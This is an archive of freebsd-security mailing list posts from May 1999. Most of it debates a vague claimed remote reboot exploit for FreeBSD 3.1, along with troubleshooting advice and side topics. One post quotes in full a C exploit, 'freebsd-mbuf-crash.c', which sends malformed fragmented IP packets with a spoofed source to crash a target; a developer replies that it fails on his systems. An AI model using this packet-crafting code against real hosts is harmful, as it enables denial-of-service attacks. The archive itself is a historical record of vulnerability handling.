> - Jordan

What do you expect? This report came from someone at Exodus Communications.
'Nuff said.

-dre

From owner-freebsd-security Mon May 3 21:18:37 1999
Message-ID: <19990503231813.A11570@Denninger.Net>
Date: Mon, 3 May 1999 23:18:13 -0500
From: Karl Denninger
To: chris@calldei.com, "Jordan K. Hubbard"
Cc: Mike Smith, Seth, freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> <19990503225131.I10291@holly.dyndns.org>
In-Reply-To: <19990503225131.I10291@holly.dyndns.org>; from Chris Costello on Mon, May 03, 1999 at 10:51:32PM -0500
Organization: Karl's Sushi and Packet Smashers
X-Die-Spammers: Spammers will be LARTed and the remains fed to my cat

On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote:
> On Mon, May 3, 1999, Jordan K. Hubbard wrote:
> > > I have to say that Jamie really let us down by not running a raw
> > > tcpdump alongside the second targeted machine here. Any chance of
> > > provoking these people into "demonstrating" the exploit on a machine,
> > > while another connected to the same wire is running
> >
> > I'd say he or whoever first reported this to bugtraq let us down even
> > more by releasing an "advisory" in such an unknown and unverifiable
> > state. By doing so, all they've done is hand ammunition to the FUD
> > corps and given us no reasonable chance to respond since the advisory
>
>    I get the impression that that was the whole point of the
> bugtraq post, to give us more grief.

Ding!

Give that man a cigar.

Anyone who saw this done to one machine and didn't *immediately* configure
machine #2 to trap and trace on the second instance deserves raspberries -
at a minimum.

It's one thing to have it done "anonymously" (among other things you might
not be there when it goes "boom" under those conditions!) It's another to
have it done under controlled conditions and neither get an explanation OR
trap the condition that caused it yourself with a tcpdump trace.

--
--
Karl Denninger (karl@denninger.net)  Web: fathers.denninger.net
I ain't even *authorized* to speak for anyone other than myself, so give
up now on trying to associate my words with any particular organization.
From owner-freebsd-security Mon May 3 22:40:37 1999
Message-Id: <199905032341.2518302.6@warped.cswnet.com>
From: lambert@warped.cswnet.com
Date: Tue, 04 May 1999 00:35:57 -0500
To: freebsd-security@freebsd.org
Subject: Disallowing login to all but wheel members?

Hi,

I gather that one can supply the correct parameters to login.conf and
disallow logins to anyone except wheel members. I have an old server up
running 2.1.6 that is doing this with login.access. Things have changed. :-)
The replacement is going to be a recent -STABLE.

The docs aren't making complete sense to me yet. (I lack experience with
the terminology.) Could somebody slip me a hint or even a brief example?

Thanks,

Scott Lambert
lambert@cswnet.com

From owner-freebsd-security Tue May 4 02:09:08 1999
Message-ID: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk>
Reply-To: "Greg Quinlan"
From: "Greg Quinlan"
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
Date: Sat, 8 May 1999 10:08:45 +0100

This sounds so.. so very familiar!!

I have been the target of exploits before......

The exact same thing I have been experiencing........but not for about 5
days now!

I'm not convinced it's a pure exploit.. (i.e. a program specifically
written for the purpose)

Greg

-----Original Message-----
From: Karl Denninger
To: chris@calldei.com ; Jordan K. Hubbard
Cc: Mike Smith ; Seth ; freebsd-stable@FreeBSD.ORG ; security@FreeBSD.ORG ; jamie@exodus.net
Date: 04 May 1999 05:20
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)

>On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote:
>> On Mon, May 3, 1999, Jordan K. Hubbard wrote:
>> > > I have to say that Jamie really let us down by not running a raw
>> > > tcpdump alongside the second targeted machine here. Any chance of
>> > > provoking these people into "demonstrating" the exploit on a machine,
>> > > while another connected to the same wire is running
>> >
>> > I'd say he or whoever first reported this to bugtraq let us down even
>> > more by releasing an "advisory" in such an unknown and unverifiable
>> > state. By doing so, all they've done is hand ammunition to the FUD
>> > corps and given us no reasonable chance to respond since the advisory
>>
>>    I get the impression that that was the whole point of the
>> bugtraq post, to give us more grief.
>
>Ding!
>
>Give that man a cigar.
>
>Anyone who saw this done to one machine and didn't *immediately* configure
>machine #2 to trap and trace on the second instance deserves raspberries -
>at a minimum.
>
>It's one thing to have it done "anonymously" (among other things you might
>not be there when it goes "boom" under those conditions!) It's another to
>have it done under controlled conditions and neither get an explanation
>OR trap the condition that caused it yourself with a tcpdump trace.
>
>--
>--
>Karl Denninger (karl@denninger.net)  Web: fathers.denninger.net
>I ain't even *authorized* to speak for anyone other than myself, so give
>up now on trying to associate my words with any particular organization.
>

From owner-freebsd-security Tue May 4 02:47:36 1999
From: "Raymond Wiker"
Message-Id: <14126.49715.589157.172436@foobar.orion.no>
Date: Tue, 4 May 1999 11:47:31 +0200 (CEST)
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
In-Reply-To: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk>
References: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk>

Greg Quinlan writes:
 > This sounds so.. so very familiar!!
 >
 > I have been the target of exploits before......
 >
 > The exact same thing I have been experiencing........but not for about 5
 > days now!
 >
 > I'm not convinced it's a pure exploit.. (i.e. a program specifically written
 > for the purpose)

My first post to freebsd-stable (and security) - and it's a me-too :-)

I'm running 3.1-RELEASE on a 486 with 16 MB of RAM, and this machine has
been falling over regularly.
Up until now I have suspected the local electricity, but it had rebooted
this morning, even though it's now on a UPS.

I have two other machines running 3.1-RELEASE in a slightly less hostile
environment (i.e, no direct connections outwards), and they have been much
more stable. I cannot rule out a hardware problem on the 486; I'll know for
sure as soon as I upgrade it.

//Raymond.

From owner-freebsd-security Tue May 4 07:35:03 1999
Date: Tue, 4 May 1999 10:34:50 -0400 (EDT)
From: Simon Karpen
To: Raymond Wiker
Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
In-Reply-To: <14126.49715.589157.172436@foobar.orion.no>

On Tue, 4 May 1999, Raymond Wiker wrote:
> I have two other machines running 3.1-RELEASE in a slightly
> less hostile environment (i.e, no direct connections outwards), and
> they have been much more stable. I cannot rule out a hardware problem
> on the 486; I'll know for sure as soon as I upgrade it.

I have 3.1-STABLE in a fairly hostile network environment. I've found that
the following will make the system unstable and reboot. If you avoid all of
these, it's solid as a rock. (otherwise you get the reboots)

VESA support
VM86 support
OSS/Payware sound drivers

With any of these, the system will reboot anywhere from a few minutes to a
day or two after being brought up, usually within a few hours. With all of
these removed, it's stable.

The system is a PII/266 192MB with SCSI disks on a Buslogic, a Tulip (de0)
ethernet card, Matrox G200 video, and a Creative Vibra16Xv soundcard.

--Simon

--
Simon Karpen
karpes@rpi.edu  slk@acm.rpi.edu
#include
I don't speak for RPI in any way.
"Those that give up essential liberty to obtain a little temporary safety,
deserve neither liberty nor safety." --Ben Franklin

From owner-freebsd-security Tue May 4 08:52:43 1999
From: Darren Reed
Message-Id: <199905041526.BAA29421@cheops.anu.edu.au>
Subject: freebsd mbuf crash
To: freebsd-security@freebsd.org
Date: Wed, 5 May 1999 01:26:38 +1000 (EST)

is this one (below) taken care of ?  perhaps a derivative of this ?

darren

/* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
 * I'm only releasing this as an example because the bug hardly ever reliably
 * crashes a machine.
 */
#include
#include
#include
#define __FAVOR_BSD
#include
#include
#include
#include
#include
#include

u_long htona(char *host)
{
    u_long addr;
    struct hostent *hp;

    if ((addr=inet_addr(host)) == INADDR_NONE) {
        if ((hp = gethostbyname(host)) == NULL)
            return(-1);
        bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
    }
    return(addr);
}

int main(int argc, char* argv[])
{
    char buf[128];
    struct ip *iph = (struct ip *)buf;
    u_char *ipoptions = (u_char *)(buf + sizeof(struct ip));
    struct tcphdr *tcph = (struct tcphdr *)(buf + 60);
    int s, i;
    struct sockaddr_in sin;

    if (argc != 2) {
        printf("usage\n\t%s \n", argv[0]);
        exit(1);
    }

    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) {
        perror("socket");
        exit(1);
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(7);
    sin.sin_addr.s_addr = htona(argv[1]);
    if (sin.sin_addr.s_addr == -1) {
        printf("Error resolving %s\n", argv[1]);
        exit(1);
    }

    bzero(buf, sizeof(buf));
    iph->ip_hl=15;
    iph->ip_v=4;
    iph->ip_len=htons(124);
    iph->ip_id= htons(getpid());
    iph->ip_off= htons(IP_MF);
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
    iph->ip_src.s_addr = htona("10.2.3.4");

    for (i = 0; i < 20;i++) {
        ipoptions[i]=0xff;
    }
    ipoptions[0] = 0xff; /* Made up option */
    ipoptions[1] = 0x1a;
    memset((char *)&ipoptions[2], 0xff, 37);
    ipoptions[39] = 1; /* IP_NOP */

    tcph->th_sport = htons(5505);
    tcph->th_dport = htons(23);
    tcph->th_seq = htonl(0xabcde123);
    tcph->th_ack = htonl(0x321edcba);
    tcph->th_flags = TH_ACK | TH_PUSH;
    tcph->th_win = htons(0x1234);

    if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
        perror("sendto");
        exit(1);
    }
    if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
        perror("sendto");
        exit(1);
    }

    iph->ip_len = htons(80);
    iph->ip_off = htons(8);
    if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
        perror("sendto");
        exit(1);
    }
    exit(0);
}
freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 10: 9:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp0.mindspring.com (smtp0.mindspring.com [207.69.200.30]) by hub.freebsd.org (Postfix) with ESMTP id 897D814C0F; Tue, 4 May 1999 10:09:42 -0700 (PDT) (envelope-from honig@sprynet.com) Received: from maryanne (user-38ldg75.dialup.mindspring.com [209.86.192.229]) by smtp0.mindspring.com (8.8.5/8.8.5) with SMTP id NAA29202; Tue, 4 May 1999 13:09:36 -0400 (EDT) Message-Id: <3.0.5.32.19990504100851.007f5820@m7.sprynet.com> X-Sender: honig@m7.sprynet.com X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Tue, 04 May 1999 10:08:51 -0700 To: (Recipient list suppressed) From: David Honig Subject: BSD & /dev/random web page Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've posted a small collection of my BSD and crypto-randomness-related pages at http://www.geocities.com/SiliconValley/Code/4704/ This includes MUST code in C (and a PDF copy of Maurer's paper), How to instrument BSD with sysctl,How to Verify your IPsec, and studies of /dev/random. The site collects in a permenant place the hacks that I've posted in various fora. I've included a modified BSD random_machdep.c file on the web site which includes sysctl switches for various parts of the /dev/random system. With this, I've observed: By replacing the MD5 hash with an insecure version, (so you can 'see' into the random pool) you can monitor, in real-time, the entropy of your random pool ("cat /dev/urandom | uliscan") and see the effect of various interrupts as they temporarily boost the entropy. This study is in progress. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 11: 0:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from warped.cswnet.com (warped.cswnet.com [209.136.201.6]) by hub.freebsd.org (Postfix) with SMTP id 78CF614F07 for ; Tue, 4 May 1999 11:00:26 -0700 (PDT) (envelope-from lambert@warped.cswnet.com) Received: from gronk.csw.net ( [209.136.201.13] ) by warped.cswnet.com (Hethmon Brothers Smtpd) ; Tue, 4 May 1999 12:01:16 -0600 Message-Id: <199905041201.1622796.6@warped.cswnet.com> From: lambert@warped.cswnet.com Date: Tue, 04 May 1999 13:00:20 -0500 To: freebsd-security@freebsd.org In-Reply-To: <199905032341.2518302.6@warped.cswnet.com> Subject: Re: Disallowing login to all but wheel members? X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.60 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In <199905032341.2518302.6@warped.cswnet.com>, on 05/04/99 at 12:35 AM, lambert@warped.cswnet.com said: >Hi, >I gather that one can supply the correct parameters to login.conf and Never mind. I apparently had a stroke of stupidity. I've got things fixed up in login.access. 
Thanks, To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 11:24:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 6C27E157B3; Tue, 4 May 1999 11:24:39 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id LAA14835; Tue, 4 May 1999 11:24:32 -0700 (PDT) (envelope-from dillon) Date: Tue, 4 May 1999 11:24:32 -0700 (PDT) From: Matthew Dillon Message-Id: <199905041824.LAA14835@apollo.backplane.com> To: "Raymond Wiker" Cc: , Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk> <14126.49715.589157.172436@foobar.orion.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Greg Quinlan writes: : > This sounds so.. so very familiar!! : > : > I have been the target of exploits before...... : > : > The exact same thing I have been experiencing........but not for about 5 : > days now! : > : > I'm not convinced its a pure exploit.. (i.e. a program specifically written : > for the purpose) : : My first post to freebsd-stable (and security) - and it's a :me-too :-) : : I'm running 3.1-RELEASE on a 486 with 16 MB of RAM, and this :machine has been falling over regularly. Up until now I have suspected :the local electricity, but it had rebooted this morning, even though :it's now on a UPS. : : I have two other machines running 3.1-RELEASE in a slightly :less hostile environment (i.e, no direct connections outwards), and :they have been much more stable. I cannot rule out a hardware problem :on the 486; I'll know for sure as soon as I upgrade it. : : //Raymond. Setup a serial console and monitor it so you can see the panic message. 
Or, better, configure the kernel to drop into DDB when it panics so you can do a stack 'trace', and report the results. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:51:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AFADE15DD0 for ; Tue, 4 May 1999 13:51:21 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11178; Tue, 4 May 1999 14:50:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04619; Tue, 4 May 1999 14:50:34 -0600 (MDT) Message-Id: <199905042050.OAA04619@harmony.village.org> To: Brett Glass Subject: Re: Claimed remote reboot exploit: Real or bogus? Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 17:11:14 MDT." <4.2.0.37.19990503171021.04dd6630@localhost> References: <4.2.0.37.19990503171021.04dd6630@localhost> Date: Tue, 04 May 1999 14:50:34 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.0.37.19990503171021.04dd6630@localhost> Brett Glass writes: : Can anyone confirm or deny the existence of this exploit? I've not seen anything that has come accross my desk that would account for this behavior. There are a few interesting exploit programs that I've seen recently, but I can't get them to kill any of the machines I've tried them on. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:52:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E3DB115DD2 for ; Tue, 4 May 1999 13:51:22 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11180 for ; Tue, 4 May 1999 14:50:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04590; Tue, 4 May 1999 14:49:20 -0600 (MDT) Message-Id: <199905042049.OAA04590@harmony.village.org> To: Gustavo V G C Rios Subject: Re: Security advisories Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 22:10:41 -0300." <372E4911.3A384379@tdnet.com.br> References: <372E4911.3A384379@tdnet.com.br> Date: Tue, 04 May 1999 14:49:19 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <372E4911.3A384379@tdnet.com.br> Gustavo V G C Rios writes: : Where can i get Security advisories for FreeBSD 2.2.8-Stable ? : http://www.freebsd.org/security/#adv is too old! : The last one is 08/98, FreeBSD is a very secure OS, or nobody knows it's : bugs, what's the truth ? : How can i keep myself up to date with security under FreeBSD ? I don't think there have been any security advisories since then. There have been a number of fixes that might impact security, but none of them have been severe enough to issue an advisory. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:53: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 925B415134 for ; Tue, 4 May 1999 13:53:00 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11190; Tue, 4 May 1999 14:52:16 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04643; Tue, 4 May 1999 14:52:12 -0600 (MDT) Message-Id: <199905042052.OAA04643@harmony.village.org> To: Brett Glass Subject: Re: Claimed remote reboot exploit: Real or bogus? Cc: "David G. Andersen" , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 17:29:20 MDT." <4.2.0.37.19990503172000.04f63ee0@localhost> References: <4.2.0.37.19990503172000.04f63ee0@localhost> <4.2.0.37.19990503171021.04dd6630@localhost> Date: Tue, 04 May 1999 14:52:12 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.0.37.19990503172000.04f63ee0@localhost> Brett Glass writes: : Still, the release of 3.2-R is nigh, and we DO want to install that : one. So, we'd like to see the exploit identified and squashed before : 3.2-R goes out the door. I'm real keen on that as well. If anybody gets a copy of an exploit, please forward it to the security officer with explicit instructions on how to run it. I've had a few exploits come accross recently that have said they were bad, but weren't trivial to run. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 13:54:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E18FD14F78; Tue, 4 May 1999 13:54:26 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA11194; Tue, 4 May 1999 14:53:42 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA04656; Tue, 4 May 1999 14:53:34 -0600 (MDT) Message-Id: <199905042053.OAA04656@harmony.village.org> To: Vince Vielhaber Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Cc: Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 03 May 1999 19:40:59 EDT." References: Date: Tue, 04 May 1999 14:53:34 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Vince Vielhaber writes: : It's typically in bad taste to post it to BugTraq before contacting the : vendor. I can say that no one appears to have contacted security-officer about this. People have contacted us in the past saying that their machine randomly reboots. When pressed for details, or to enable ddb or crash dumps to see why the machine is rebooting, they disappear and nothing further is heard from them. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14: 4:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 94FC215DD3 for ; Tue, 4 May 1999 14:04:07 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA11246; Tue, 4 May 1999 15:03:24 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA04810; Tue, 4 May 1999 15:03:20 -0600 (MDT) Message-Id: <199905042103.PAA04810@harmony.village.org> To: Darren Reed Subject: Re: freebsd mbuf crash Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 05 May 1999 01:26:38 +1000." <199905041526.BAA29421@cheops.anu.edu.au> References: <199905041526.BAA29421@cheops.anu.edu.au> Date: Tue, 04 May 1999 15:03:20 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199905041526.BAA29421@cheops.anu.edu.au> Darren Reed writes: : is this one (below) taken care of ? perhaps a derivitice of this ? What's it supposed to do? I can't get it to cause any grief on my -current system, nor on the 3.1-stable based systems we have here at work. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:10:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.usinternet.com (smtp.usinternet.com [216.17.3.30]) by hub.freebsd.org (Postfix) with ESMTP id 3781215C1E; Tue, 4 May 1999 14:09:50 -0700 (PDT) (envelope-from mike@negativezero.com) Received: from lobster ([216.17.11.49]) by smtp.usinternet.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with SMTP id com; Tue, 4 May 1999 16:09:49 -0500 X-Sender: nz-postmaster@mail.negativezero.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0 Date: Tue, 04 May 1999 16:13:12 -0500 To: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG From: Mike Uttech Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <199905042053.OAA04656@harmony.village.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Message-Id: <19990504210951.3781215C1E@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We used to have problems with one of our 3.1-RELEASE boxes randomly locking up with no logs of why. We decided to split the load off of the one machine and have not had a problem with it locking up since. If my memory serves me today, I remember reading about a problem in the 3.1-RELEASE distribution that under heavy load caused the system to hang or reboot. I personally feel that many of these people (the ones who are saying they have been having random reboots) are not being attacked in anyway but rather are having their machines overloaded and rebooting. Mike At 03:53 PM 5/4/99 , Warner Losh wrote: >In message Vince Vielhaber writes: >: It's typically in bad taste to post it to BugTraq before contacting the >: vendor. > >I can say that no one appears to have contacted security-officer about >this. 
People have contacted us in the past saying that their machine >randomly reboots. When pressed for details, or to enable ddb or crash >dumps to see why the machine is rebooting, they disappear and nothing >further is heard from them. > >Warner > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:12: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 545BB14F9C for ; Tue, 4 May 1999 14:11:56 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org) Received: by fed-ef1.frb.gov; id RAA23519; Tue, 4 May 1999 17:11:39 -0400 (EDT) Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma023290; Tue, 4 May 99 17:11:04 -0400 Date: Tue, 04 May 1999 17:10:55 -0400 (EDT) From: Seth Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: <199905042053.OAA04656@harmony.village.org> To: Warner Losh Cc: Vince Vielhaber , security@FreeBSD.ORG Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In my defense (and to reiterate): 1) I saw this hit bugtraq and, having seen nothing on any lists about it, assumed (correctly, as it turns out) that the customary "vendor" notifications had not been sent. I therefore sent it to -stable and to security@freebsd.org. 2) I am not the one claiming the alleged vulnerability. I'm the one reporting that it was claimed. (It seems I need to make this clear due to the numerous emails from cranky BSD citizens criticizing me for posting to bugtraq before notifying security@. Once again: **I didn't post this to bugtraq!** I merely saw it there and passed it along. 
I have NO IDEA whether this is a real vulnerability, but I thought it was something the security folks should know about as soon as possible, either to try to reproduce [unlikely given the lack of details] or to prepare a response.) Sorry if it seems like I'm doing damage control. I am, in a way. I'm just tired of the senseless flames I'm getting accusing me of heinous crimes against the freebsd community -- crimes for which I have, and will accept, no responsibility. SB On Tue, 4 May 1999, Warner Losh wrote: > In message Vince Vielhaber writes: > : It's typically in bad taste to post it to BugTraq before contacting the > : vendor. > > I can say that no one appears to have contacted security-officer about > this. People have contacted us in the past saying that their machine > randomly reboots. When pressed for details, or to enable ddb or crash > dumps to see why the machine is rebooting, they disappear and nothing > further is heard from them. > > Warner > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:14:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2C03D14D17 for ; Tue, 4 May 1999 14:14:15 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA11299; Tue, 4 May 1999 15:13:32 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA04984; Tue, 4 May 1999 15:13:29 -0600 (MDT) Message-Id: <199905042113.PAA04984@harmony.village.org> To: Seth Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) 
Cc: Vince Vielhaber , security@FreeBSD.ORG In-reply-to: Your message of "Tue, 04 May 1999 17:10:55 EDT." References: Date: Tue, 04 May 1999 15:13:29 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Seth writes: : 1) I saw this hit bugtraq and, having seen nothing on any lists about : it, assumed (correctly, as it turns out) that the customary "vendor" : notifications had not been sent. I therefore sent it to -stable and to : security@freebsd.org. I know that you just forwarded it. I was just letting people know that the secure channels didn't see this either. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:22:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 92F2614C8E for ; Tue, 4 May 1999 14:22:48 -0700 (PDT) (envelope-from des@ifi.uio.no) Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id XAA07687 for ; Tue, 4 May 1999 23:22:47 +0200 (MET DST) Received: (from des@localhost) by hrotti.ifi.uio.no ; Tue, 4 May 1999 23:22:46 +0200 (MET DST) To: security@freebsd.org Subject: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit From: Dag-Erling Smorgrav Date: 04 May 1999 23:22:44 +0200 Message-ID: Lines: 35 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------- Start of forwarded message ------- Message-ID: <19990501031840.A24252@dilbert.exodus.net> Date: Sat, 1 May 1999 03:18:40 -0500 Reply-To: jamie@exodus.net From: Jamie Rishaw Subject: FreeBSD 3.1 remote reboot exploit To: BUGTRAQ@NETSPACE.ORG Hi, Sorry to be so vague, but I wanted to let everyone know, It's been demonstrated to me by two people who will not reveal "how" that there is a remote bug exploit, 
